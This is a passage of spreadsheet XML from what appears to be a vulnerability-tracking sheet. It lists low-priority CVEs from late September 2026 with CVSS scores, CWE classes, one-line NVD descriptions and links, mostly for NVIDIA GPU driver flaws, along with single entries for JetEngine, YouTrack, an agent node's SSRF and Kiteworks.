      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47506</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S468" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel-mode color transform path where excessive kernel stack use occurs when evaluating YCbCr420 display emulation. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47506</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47517</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q469" s="5" t="inlineStr"/>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S469" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode driver where a local user may cause a null pointer dereference by submitting a crafted ioctl. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47517</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47534</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q470" s="5" t="inlineStr"/>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="S470" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause a divide by zero. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47534</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47549</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="inlineStr"/>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel module where an unprivileged local user could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47549</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47555</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where a user could cause uninitialized kernel memory to be copied back to userspace. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47555</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47557</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47557</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47566</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a memory leak in error paths leading to kernel memory exhaustion. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47566</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47567</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a user could cause uncontrolled resource consumption by exhausting the DRM VMA offset address space. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47567</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47568</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause uncontrolled kernel log generation by repeatedly invoking an interface that emits unrate-limited error messages. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47568</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47581</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>CWE-667</t>
        </is>
      </c>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where a user could cause improper locking. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47581</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47584</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker with local access could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47584</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47603</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user may access another process's GPU channel state due to missing authorization checks. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47603</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47604</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user may access another process's GPU channel state due to missing authorization checks. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47604</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97238</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in JetEngine &lt;= 3.8.14.3 versions.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97238</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100261</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 changing article visibility settings was possible without update permission</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100261</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101883</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node through 2026.9.4 contains a server-side request forgery vulnerability in the canvas.present capability that bypasses URL risk evaluation enforced by canvas.navigate. Attackers with gateway or agent access can issue canvas.present to make the node's WebView send requests to localhost, private networks, or tailnet services from the user's machine.</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101883</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102134</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>CWE-420</t>
        </is>
      </c>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core did not apply its gateway-level API security controls to every request authenticated through the platform's central authentication service. An authenticated user could reach REST API functionality over a request path on which those controls, including enforcement of signed-out and revoked sessions, were not applied.</t>
        </is>
      </c>
